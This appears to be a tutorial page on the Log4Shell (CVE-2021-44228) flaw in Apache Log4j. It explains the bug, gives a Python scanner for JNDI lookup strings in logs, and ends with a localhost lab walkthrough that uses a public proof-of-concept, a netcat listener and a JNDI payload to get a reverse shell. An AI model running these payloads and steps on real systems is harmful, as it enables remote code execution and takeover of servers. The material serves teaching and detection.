Log4j is a fast, reliable and flexible logging framework written in Java. It is an open-source logging API for Java.
Put simply, logging is a way to indicate the state of the system at runtime. Logs are used to capture and persist important data and make it available for analysis at any point in time.
The Log4j vulnerability, also known as “Log4Shell” or “CVE-2021-44228,” is a critical security vulnerability that affects the Apache Log4j library, which is a widely used Java-based logging utility. This vulnerability allows attackers to execute arbitrary code remotely by sending specially crafted requests to a server that uses the vulnerable Log4j library for logging purposes. The vulnerability was assigned the identifier CVE-2021-44228.
Background: Log4j is an open-source logging library for Java applications, widely used to capture application log messages. It allows developers to control the output of log messages and configure various log levels. Unfortunately, a critical vulnerability was discovered in Log4j that allowed attackers to execute malicious code remotely. The vulnerability stemmed from the way Log4j processed user-provided data in its logging feature.
Impact: The Log4j vulnerability had the potential to be extremely damaging due to its widespread usage and the nature of the attack vector. If exploited successfully, attackers could execute arbitrary code on affected servers, potentially leading to complete compromise of the system, data theft, or further attacks on internal networks. The vulnerability’s impact was not limited to specific industries or organizations, as Log4j is used in a wide variety of applications and services.
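Because the flaw is triggered by user-provided data reaching a log call, one defensive check is to search request and application logs for JNDI lookup strings of the form ${jndi:ldap://host:port/path}. The Python sketch below is an added example, not part of the original page or the Log4j project; the log lines are constructed, the function names are hypothetical, and it only matches the plain and URL-encoded forms of the lookup.

```python
import re
from urllib.parse import unquote, urlsplit

# Matches a JNDI lookup such as ${jndi:ldap://host:1389/a}, case-insensitively.
JNDI_RE = re.compile(r"\$\{jndi:([a-z]+)://([^}\s]+)\}", re.IGNORECASE)


def decode_fully(text, max_rounds=3):
    """Undo up to max_rounds of URL encoding (%24%7B becomes ${)."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def find_jndi_lookups(line):
    """Return (scheme, host, port) for each JNDI lookup found in a log line."""
    hits = []
    for scheme, rest in JNDI_RE.findall(decode_fully(line)):
        parts = urlsplit(f"{scheme.lower()}://{rest}")
        try:
            port = parts.port
        except ValueError:  # malformed port: still report the lookup
            port = None
        hits.append((scheme.lower(), parts.hostname, port))
    return hits


# Constructed sample lines (not taken from a real system).
SAMPLE_LOG = [
    '127.0.0.1 - - "POST /login HTTP/1.1" 200 uname=alice',
    '127.0.0.1 - - "POST /login HTTP/1.1" 200 uname=${jndi:ldap://127.0.0.1:1389/a}',
    '127.0.0.1 - - "GET /?q=%24%7BJNDI%3Aldap%3A%2F%2F127.0.0.1%3A1389%2Fa%7D HTTP/1.1" 200',
]


def scan(lines):
    """Map 1-based line number -> lookups, for lines containing at least one."""
    found = ((n, find_jndi_lookups(l)) for n, l in enumerate(lines, start=1))
    return {n: hits for n, hits in found if hits}


if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG).items():
        print(f"line {number}: {hits}")
```

The extracted host and port tell a responder which outbound connection to look for in firewall or proxy logs for the same time window.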
How Hackers Exploit This
Use this GitHub link to install: https://github.com/kozmer/log4j-shell-poc
For the additional requirements, use:

    pip install -r requirements.txt

Start a netcat listener to accept the reverse shell connection:

    nc -lvnp 9001

To launch this exploit you have to install "java jdk1.8.0_20", and it should be present in the same directory. After you have successfully installed Java on your system, the command is:

    python3 poc.py --userip localhost --webport 8000 --lport 9001

This script will set up the HTTP server and the LDAP server for you, and it will also create the payload that you can paste into the vulnerable parameter. After this, if everything went well, you should get a shell on the lport.

Now open a new terminal and use these commands:

    1: docker build -t log4j-shell-poc .
    2: docker run --network host log4j-shell-poc
Once it is running, you can access it on localhost:8080. In the username field, type:

    ${jndi:ldap://localhost:1389/a}

For this to run on your localhost, use 127.0.0.1 instead of localhost. In the password field, type "password". Then go to the netcat listener: there you have the reverse shell connection, and the exploit is successfully completed.